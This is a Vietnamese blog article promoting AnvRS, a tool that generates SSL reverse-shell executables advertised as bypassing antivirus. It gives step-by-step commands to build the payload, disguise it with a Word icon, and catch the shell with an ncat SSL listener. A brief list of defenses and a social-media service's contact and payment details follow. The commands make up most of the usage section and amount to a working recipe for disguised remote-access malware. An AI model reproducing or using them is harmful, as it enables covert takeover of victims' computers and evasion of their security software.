Trong thời đại Internet, việc bảo mật thông tin và hệ thống trước những mối nguy hiểm trở nên cần thiết hơn bao giờ hết. Cùng với sự ra đời của những công cụ bảo mật và diệt virus, các hacker cũng không ngừng tìm cách để lách qua rào cản bảo mật và tấn công các hệ thống mục tiêu. Một trong những kỹ thuật phổ biến trong việc xâm nhập hệ thống mạng mà các hacker sử dụng để tiếp cận và kiểm soát các hệ thống từ xa là “Reverse Shell”. Đây là một khái niệm đã trở nên không còn xa lạ với cộng đồng an ninh mạng. Các biện pháp bảo mật ngày càng tinh vi và chặt chẽ hơn, việc tìm kiếm cách để xâm nhập vào hệ thống một cách ẩn danh và tránh được sự theo dõi trở nên thách thức hơn bao giờ hết. Trong tình huống như vậy, việc sử dụng Reverse Shell thông qua SSL đã trở thành một trong những phương pháp ưa thích của các hacker và người nghiên cứu bảo mật. Trong bài viết này, mình muốn giới thiệu đến cho các bạn một công cụ mang tên AnvRS. Đây là một công cụ Reverse Shell được phát triển bởi Tricker Channel với khả năng bypass các phần mềm chống virus thông qua việc sử dụng kết nối SSL. Trước khi vào vấn đề chính, mình sẽ nói ngắn gọn về khái niệm của Reverse Shell và SSL.
Lưu ý!
Công cụ này chỉ dành cho mục đích giáo dục, nghiên cứu và học tập. Vui lòng không sử dụng vào mục đích xấu. Tricker Channel sẽ không chịu toàn bộ trách nhiệm về các hành vi bất hợp pháp!
Reverse Shell và SSL là gì ?
- Reverse Shell: Là một kỹ thuật phổ biến đối với việc xâm nhập hệ thống mạng, nơi các máy tính bị xâm nhập sẽ tạo ra một kết nối với máy tính mục tiêu của kẻ tấn công. Điều này cho phép kẻ tấn công tiến hành các hoạt động xâm nhập từ xa, bao gồm cài đặt mã độc, đánh cắp dữ liệu, sửa đổi cấu hình hệ thống, v.v. Kỹ thuật này chủ yếu được sử dụng nhằm khai thác độ tin cậy của hệ thống mạng và tạo ra một cửa sổ ảo nhằm thực hiện các hoạt động xâm nhập.
- SSL (Secure Sockets Layer): Là giao thức bảo mật được thiết kế nhằm mã hoá dữ liệu truyền giữa máy tính người dùng và máy chủ, ngăn người thứ ba nào lấy được dữ liệu. SSL tạo ra một kênh bảo mật giữa hai bên nhằm bảo vệ sự riêng tư và toàn vẹn của dữ liệu.
Cách cài đặt và sử dụng công cụ AnvRS – Reverse Shell Bypass Antivirus
-m pip uninstall pyinstaller
và cài đặt phiên bản mới nhất, hiện tại phiên bản mới nhất của Pyinstaller là 5.13.1cd bootloader
python ./waf all
python -m pip install .
python AnvRS.py -i <YourIpAddress> -p <YourPort> -o <YourName>.exe
python AnvRS.py -i 127.0.0.1 -p 6789 -o ReverseShell.exe
python AnvRS.py -i 127.0.0.1 -p 6789 --icon <PathToIconFile>.ico -o ReverseShell.exe
python AnvRS.py -i 127.0.0.1 -p 6789 --icon C:\Users\test\Downloads\word.ico -o ReverseShell.exe
ncat --ssl -lnvp <YourPort> -4 <YourIpAddress>
ncat --ssl -lnvp 6789 -4 127.0.0.1
AnvRS – một công cụ mạnh mẽ dành cho việc tạo ra các reverse shell có khả năng bypass antivirus. Nếu bạn là một chuyên gia bảo mật, hay là Pentester thì đây là một công cụ đáng để nghiên cứu và học tập. Đừng quên luôn duy trì tinh thần học hỏi và cùng nhau xây dựng một cộng đồng an toàn và bảo mật trên không gian số ngày nay nhé ! Sau đây là một số cách phòng chống.
Cách phòng chống cuộc tấn công sử dụng kỹ thuật Reverse Shell kết hợp với SSL
- Firewall và ACLs: Thiết lập tường lửa (firewall) và danh sách kiểm soát truy cập (Access Control Lists – ACLs) để kiểm soát và giới hạn quyền truy cập vào hệ thống từ bên ngoài. Chặn các kết nối không cần thiết và chỉ cho phép các kết nối đến từ các nguồn đáng tin cậy
- Kiểm tra và theo dõi lưu lượng mạng: Theo dõi lưu lượng mạng và kiểm tra các kết nối đang diễn ra. Phát hiện sự xuất hiện của các kết nối lạ và không mong muốn có thể giúp bạn ngăn chặn các cuộc tấn công
- Cập nhật hệ thống và ứng dụng: Đảm bảo rằng hệ thống và các ứng dụng của bạn luôn được cập nhật lên phiên bản mới nhất, bao gồm cả các bản vá bảo mật. Điều này giúp giảm thiểu các lỗ hổng bảo mật mà kẻ tấn công có thể tận dụng
- Phần mềm chống virus và phát hiện xâm nhập: Sử dụng phần mềm chống virus và phần mềm phát hiện xâm nhập để kiểm tra và ngăn chặn các hoạt động độc hại. Cập nhật và cấu hình một cách thường xuyên
- Giám sát hoạt động không thường xuyên: Theo dõi hoạt động của hệ thống để phát hiện các biểu hiện của cuộc tấn công hoặc hoạt động bất thường
- Phân tích lưu lượng mạng: Sử dụng các công cụ phân tích lưu lượng mạng để xác định các mẫu không bình thường và hoạt động xâm nhập
- Quản lý quyền truy cập: Hạn chế quyền truy cập của người dùng và ứng dụng chỉ vào những gì cần thiết. Điều này giảm thiểu khả năng kẻ tấn công lợi dụng quyền truy cập để thực hiện các cuộc tấn công
- Xác thực và ủy quyền: Áp dụng các biện pháp xác thực mạnh mẽ và quản lý ủy quyền cẩn thận để đảm bảo rằng chỉ các người dùng có quyền truy cập thực sự có thể tham gia vào hệ thống
Facebook: Dịch Vụ Mạng Xã Hội Đà Nẵng
Zalo: Dịch Vụ Đà Nẵng
Phone: 0333.110304
Gmail: mxhdn.xyz@gmail.com
Thanh toán: Ngân hàng, thẻ cào siêu rẻ, Momo, ViettelPay, card + 35% phí,...